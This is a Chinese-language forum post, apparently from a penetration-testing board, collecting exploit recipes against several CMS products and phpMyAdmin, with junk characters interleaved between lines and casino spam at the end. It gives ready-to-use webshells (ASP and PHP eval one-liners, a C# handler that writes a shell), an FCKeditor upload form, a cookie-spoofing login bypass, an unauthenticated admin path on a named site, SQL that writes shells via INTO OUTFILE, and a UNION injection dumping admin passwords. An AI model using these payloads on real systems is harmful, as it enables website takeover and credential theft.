---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% B$ B' v* J2 B3 d6 }
! @* e! S/ x9 P+ o
YxShop易想购物商城4.7.1版本任意文件上传漏洞
2 E: ~3 o+ g; [0 [
) A/ Q) v# t% ]. l, | _, {
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
& X7 Y: j0 W/ s; ^) `" Z, }5 ?
跳转到网站根目录上传任意文件。
6 r* w1 a: @; t, C6 [8 l+ ?
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
- G+ F- `; F o0 u2 C& l9 u
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
5 i# j4 V1 Q1 f s2 @
Upload a new file:<br>
" s/ }2 }% P- V3 A- A; g' N, X
<input type="file" name="NewFile" size="50"><br>
! h2 H1 i; G+ w
<input id="btnUpload" type="submit" value="Upload">
( \! p6 K3 t& u* @0 x
</form>
4 B, |7 T5 x3 O3 U# \" B1 ~. h
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" B. k2 h n7 ?- l4 D
6 U5 v1 G3 ?/ {/ V$ }
SDcms 后台拿webshell
3 R8 u% ~- c3 \6 Q0 ^0 k. l, V
: B9 z& U! @ ?2 x( j
第一种方法:
: s& Z9 h7 W5 V% I. O* J
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
, y4 b; n& S, P9 |6 e, B
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
{6 V0 F+ n! V% T! b( O0 j; ~( B
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
" x' B# F2 n' T; Z7 m+ F
第二种方法:
5 D X5 c% \- |5 Q* U4 N. h
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
9 D3 M0 a+ q2 k* O- S, b
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
* u2 I: s# t" B2 n7 o5 j
第三种方法:
+ e% {- b: N4 j: z5 a" q
进入后台-->界面管理-->模板文件管理-->创建文件
5 b" B- `! ?5 \2 P
文件名写入getshell.ashx
+ ?* H, Y4 k4 K+ e; X$ H1 n
内容写入下面内容:
& q- V! J% n1 ~* _. S
/====================复制下面的=========================/
" e s/ z3 @1 J
<%@ WebHandler Language="C#" Class="Handler" %>
0 ^0 w1 j7 ^$ |. l+ |/ K
using System;
2 h( }% f8 d$ Q8 ^+ t% H
using System.Web;
s$ O+ Q8 ?" w$ J- g# j6 U
using System.IO;
6 p$ h+ A1 Z& [# w) P
public class Handler : IHttpHandler {
6 \1 B/ R% [6 o, \& k1 E3 c
public void ProcessRequest (HttpContext context) {
$ ^+ X. G" _8 N& G# W* a
context.Response.ContentType = "text/plain";
' i: p7 q# y# [1 l
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
1 [$ \4 H" s+ o) d& {; ]* \2 E
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
1 y, }8 O+ c+ J* l
file1.Flush();
* G8 Z# ?- s l# x( g
file1.Close();
% n7 _; ~ ~ a
}
. I: T8 k7 K) A0 h2 o
public bool IsReusable {
1 B1 K! J: i; M/ L7 z' k* a! {
get {
: m2 [% Y9 f( ^( h& [
return false;
* G% ~) u5 R& j6 W
}
' C( x# S' C5 m* D
}
/ ?$ _0 N2 @* t' o0 G
}
' ~9 Q0 [& f. T# o$ z* Z) h
/=============================================/
2 X# V+ {9 X& l/ _: m
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
. z% R* s2 F, M* M- U- K2 D* m. ?
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
" P* _8 v+ D6 X8 Q: S8 ]+ t( J3 c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; S: M6 n) x8 U# R* M- j
& M' I! j" e& A
ESCMS网站管理系统0day
/ F/ L( Z5 k) P
+ V9 \5 K' Q, [: k/ P. Y, l; W' r: b
后台登陆验证是通过admin/check.asp实现的
/ v, P4 L" Y8 T+ {( j# i
$ P* x* h) g$ }) m4 Y, e A
首先我们打开
http://target.com/admin/es_index.html
; u( a* `+ `& U2 \
然后在COOKIE结尾加上
# k8 z) B+ N$ ^
; ESCMS$_SP2=ES_admin=st0p;
1 ~1 B4 X1 S5 w. k+ L6 D9 g
修改,然后刷新
6 q# \* W4 v& Q' g( |* b3 y
进后台了嘎..
6 x/ y8 Z/ l0 D h* X. u
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
1 \4 t% m! |9 }6 I; `2 ?# R/ g2 U
5 g( P' J) b: f; r& @5 R
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
; t+ u8 ]9 }1 W/ v- z p6 s
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
/ G% g# z$ e1 P$ L* d R5 ]4 R3 |! L
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
}5 K" |8 a# J' G4 m2 ~2 I
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
; L1 K. A; C+ w- M9 ~2 b2 c2 q' g! M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: Y7 S& _1 V3 ~ |
# V& x' {- J+ b$ [) _' U
宁志网站管理系统后台无验证漏洞及修复
& R6 r ]2 \/ |1 B
. D* G! w# |& x( Z z3 V
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
' u/ G! b- U7 _! v
官方网站:
www.ningzhi.net
- D& a! C7 p8 y- }4 b) M! R8 D
学校网站管理系统 V.2011版本
% [" W1 Q, h" C
http://down.chinaz.com/soft/29943.htm
2 J( h6 r8 k" \' i1 @
其它版本(如:政府版等),自行下载.
. Y9 q2 y2 _: _2 H* U
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 q9 g* S& @' I% A+ m8 O3 k
login.asp代码如下:
9 i! o( X' \" e; P
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
1 D9 J+ a/ Y. V+ r( S+ {
manage.asp代码我就不帖出来了.反正也没验证.
/ O# Q& o0 }8 O: y+ x' K" o7 h2 m
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
4 c2 A0 c/ T _8 m" B
漏洞利用:
7 P$ B _" p2 c, ?% m5 m+ Q
直接访问
http://www.0855.tv/admin/manage.asp
& n' L" J1 J( Y0 k7 Y8 I) }% x
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
* h& o2 f8 Q+ i& d& C$ }
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' `1 n- y: w. p1 o% k+ d# m/ c1 T
: x3 t7 q. p! W- o' s
phpmyadmin拿shell的四种方法总结及修复
! @, Y( M0 F# S0 b: N- H
: }& `% S' |1 d" k& @4 B5 ^
方法一:
' e) D2 p# b( }) U- I
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
% z Y4 P! P+ k1 c: r) }+ R. K
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
$ E0 k" k# _4 I" W$ }" \8 F8 b& v% c
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% N" _( v% \9 e
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 _, ^( g3 z% g* g6 ~* P
一句话连接密码:7on
3 J6 Y; u* Z, q+ N% N
方法二:
8 N, ?- M' B" X* `9 f
读取文件内容: select load_file('E:/xamp/www/s.php');
, S% P) M. `6 F$ o+ g6 k
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
! x0 m0 D8 k; V$ w! X3 q/ r3 c
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" {; k: n+ N. V$ o/ a: o
方法三:
7 C7 {, j8 a) w* i4 E
JhackJ版本 PHPmyadmin拿shell
* `$ [: f. A) [5 V* o
Create TABLE study (cmd text NOT NULL);
2 ^- N# u8 W- N3 a. E5 }8 {
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
7 N) B. R" o/ W% \
select cmd from study into outfile 'E:/wamp/www/7.php';
2 m$ v6 s: J: d' r8 j
Drop TABLE IF EXISTS study;
6 K% i( h7 T4 J& f7 }
<?php eval($_POST[cmd])?>
% [$ p* F- F8 a* B
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
8 T3 Z5 j+ J- \- u- \3 M
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
9 W% ^1 u' h. T3 L
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
' l% ]9 T; r$ x N& U7 t
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
& p8 C4 ^* E0 U4 z; e8 o$ U
方法四:
$ v( d1 N3 P$ s2 G4 M
select load_file('E:/xamp/www/study.php');
" u7 k. d, \) P; _. p! |8 H
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
+ W9 L, G" Q3 q7 C& `/ H, |
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
3 Y" g; S+ c3 Z3 h: d7 L3 m( u9 @
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 [* m3 W% V( S% o; N9 l
3 h/ w) L0 P. Q6 ~$ D. _
NO.001中学网站管理系统 Build 110628 注入漏洞
" k6 N/ p- d- ~2 q- \
9 W) O' W& a. V+ j
NO.001中学网站管理系统功能模块:
2 W1 j4 I- a- ]5 G$ e* k3 I
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
( n2 B) k6 Y+ _* Y0 Y' f
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; k+ s: V! H0 A N+ z, @
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
9 i) g. Q7 [! n* j5 y5 d' i
4.视频图片管理:一级分类,动态添加视频或者图片等信息
* O/ y1 }* y% m, K8 h9 S+ |
5.留言管理:对留言,修改,删除、回复等管理
# y: h- E p: d+ a" F
6.校友频道:包括校友资料excel导出、管理等功能
/ C, v9 E# Q7 G& a' R& v' b
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
* ?9 X( _/ a3 [* j* J) P* x V
默认后台:admin/login.asp
% N" K$ @3 R, D' l
官方演示:
http://demo.001cms.net
/ t* M3 C' M( d0 e2 o I& _
源码下载地址:
http://down.chinaz.com/soft/30187.htm
6 a; u; T. R9 T* X; O5 o$ i+ b" }
EXP:
% f' c. R3 L; z* ~2 p3 l! n9 ^
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, ^1 l0 Z: \* a/ j1 {" @( z' ~
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- B! ^. M C) `6 T( H7 `4 h
getshell:后台有备份,你懂的
' `7 p7 a, c# w* Z6 w
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
- m9 }( A! Q- I: l% x' y- @# i
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2